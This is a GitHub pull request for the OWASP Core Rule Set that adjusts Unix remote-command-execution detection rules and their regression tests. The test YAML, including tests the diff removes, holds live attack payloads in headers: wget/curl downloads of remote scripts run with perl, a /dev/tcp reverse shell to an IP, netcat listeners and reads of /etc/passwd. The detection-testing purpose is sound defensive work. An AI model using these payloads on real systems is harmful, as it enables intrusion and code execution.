10000 fix: exclude well known user agents from unix commands by theseion · Pull Request #3190 · coreruleset/coreruleset · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

fix: exclude well known user agents from unix commands #3190

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed
wants to merge 8 commits into from
Closed

fix: exclude well known user agents from unix commands #3190

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
8 commits
Select commit Hold shift + click to select a range
815f430
fix: exclude well known user agents from unix commands
theseion Apr 4, 2023
b367458
chore: more flexible approach to allowing certain user agents
theseion Apr 16, 2023
cadd603
chore: update rules from assemblies
theseion Apr 16, 2023
2c898ee
chore: rule comments must not be preceded by whitespace
theseion Apr 17, 2023
17ba18e
chore: renumber tests
theseion Apr 17, 2023
deeb452
chore: move chain rule comments to starter rule
theseion Apr 17, 2023
6c5d58f
chore: update rules from assemblies
theseion Apr 23, 2023
28ae195
chore: remove `normalizePath` from 932238
theseion Apr 25, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
11 changes: 11 additions & 0 deletions regex-assembly/932238-chain1.ra
View file
Open in desktop
10000
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
##! Please refer to the documentation at
##! https://coreruleset.org/docs/development/regexp_assemble/.

##!+ i

##!^ \b

##!$ \b

##!> include unix-shell-upto3
##!> include unix-shell-4andup-with-params
18 changes: 18 additions & 0 deletions regex-assembly/932239-chain1.ra
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
##! Please refer to the documentation at
##! https://coreruleset.org/docs/development/regexp_assemble/.

##!+ i

##!> assemble
##!> assemble
##!> include unix-shell-evasion-prefix-start-of-string
##!<

##!> assemble
##!> include unix-shell-evasion-prefix
##!<
##!<
##!=>

##!> include unix-shell-upto3-with-params
##!> include unix-shell-4andup-with-params
198 changes: 187 additions & 11 deletions rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
View file
Open in desktop

Large diffs are not rendered by default.

4 changes: 4 additions & 0 deletions rules/benign-user-agents.data
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
# User agents that are known to be benign but cause false positives,
# like curl or wget, which are also Unix shell commands
curl/
wget/
167 changes: 22 additions & 145 deletions tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -5,102 +5,11 @@ meta:
Unix shell RCE
- with / without prefix
- command words of any length
- usual targets + `Referer` and `User-Agent`
- usual targets + `Referer`
enabled: true
name: 932236.yaml
tests:
- test_title: 932236-1
desc: "Unix RCE in request headers"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Host: localhost
User-Agent: ";chmod +x evil.php"
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-2
desc: "Unix RCE in request headers - uppercase"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Host: localhost
User-Agent: ";CHMOD +X EVIL.PHP"
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-3
desc: System Command Injection (932236) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf
method: GET
port: 80
uri: /get
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-4
desc: System Command Injection (932236) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php
method: GET
port: 80
uri: /get
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-5
desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: Something true positive &#8222;The Title&#8221;. After space or new line more characters
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip, deflate, br
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Content-Type: application/x-www-form-urlencoded
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "932236"
- test_title: 932236-6
desc: System Command Injection (932236) from old modsec regressions
stages:
- stage:
Expand All @@ -121,7 +30,7 @@ tests:
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-7
- test_title: 932236-2
desc: System Command Injection (932236) from old modsec regressions
stages:
- stage:
Expand All @@ -142,7 +51,7 @@ tests:
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-8
- test_title: 932236-3
desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
stages:
- stage:
Expand All @@ -162,23 +71,7 @@ tests:
version: HTTP/1.1
output:
no_log_contains: id "932236"
- test_title: 932236-9
desc: "False negative report - user agent"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Host: localhost
User-Agent: ;cp /var/log/apache2/error.log evil.php
method: POST
port: 80
uri: /post
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-10
- test_title: 932236-4
desc: "False negative report - POST arguments"
stages:
- stage:
Expand All @@ -195,7 +88,7 @@ tests:
data: ;cp /var/log/apache2/error.log evil.php
output:
log_contains: id "932236"
- test_title: 932236-11
- test_title: 932236-5
desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an: 1'000'000"
stages:
- stage:
Expand All @@ -215,7 +108,7 @@ tests:
version: HTTP/1.1
output:
no_log_contains: id "932236"
- test_title: 932236-12
- test_title: 932236-6
desc: "Positive test - BB BBBZARPI - d=/dev&&(sh)0>$d/tcp/51.15.142.164/777"
stages:
- stage:
Expand All @@ -233,7 +126,7 @@ tests:
version: HTTP/1.1
output:
log_contains: id "932236"
- test_title: 932236-13
- test_title: 932236-7
desc: "55O5COJ5"
stages:
- stage:
Expand All @@ -251,7 +144,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-14
- test_title: 932236-8
desc: "55O5COJ5"
stages:
- stage:
Expand All @@ -269,7 +162,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-15
- test_title: 932236-9
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -287,7 +180,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-16
- test_title: 932236-10
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -305,7 +198,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-17
- test_title: 932236-11
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -323,7 +216,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-18
- test_title: 932236-12
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -341,7 +234,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-19
- test_title: 932236-13
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -359,7 +252,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-20
- test_title: 932236-14
desc: "9323HNQU"
stages:
- stage:
Expand All @@ -377,7 +270,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-21
- test_title: 932236-15
desc: "ATFHUJVF"
stages:
- stage:
Expand All @@ -395,7 +288,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-22
- test_title: 932236-16
desc: "JW2SU88A"
stages:
- stage:
Expand All @@ -413,7 +306,7 @@ tests:
code=;cat /path/file.gz
output:
log_contains: id "932236"
- test_title: 932236-23
- test_title: 932236-17
desc: "4JOGUXYQ"
stages:
- stage:
Expand All @@ -431,7 +324,7 @@ tests:
find /etc -name passwd -exec cat {} +
output:
log_contains: id "932236"
- test_title: 932236-24
- test_title: 932236-18
desc: "ANQ9SN3S"
stages:
- stage:
Expand All @@ -449,7 +342,7 @@ tests:
code=flock -u / whoami
output:
log_contains: id "932236"
- test_title: 932236-25
- test_title: 932236-19
desc: "JW2SU88A"
stages:
- stage:
Expand All @@ -467,7 +360,7 @@ tests:
code=cat /path/file.gz
output:
log_contains: id "932236"
- test_title: 932236-26
- test_title: 932236-20
desc: "P6E0KY27"
stages:
- stage:
Expand All @@ -485,23 +378,7 @@ tests:
code=cpulimit -l 100 -f whoami
output:
log_contains: id "932236"
- test_title: 932236-27
desc: "IXMZUXBG"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: a=nc&&$a -nlvp 555
Host: localhost
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
method: GET
port: 80
uri: /get
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-28
- test_title: 932236-21
desc: "IXMZUXBG"
stages:
- stage:
Expand All @@ -518,7 +395,7 @@ tests:
version: HTTP/1.0
output:
log_contains: id "932236"
- test_title: 932236-29
- test_title: 932236-22
desc: "FP agains 'fi' without word boundary"
stages:
- stage:
Expand Down
Loading
0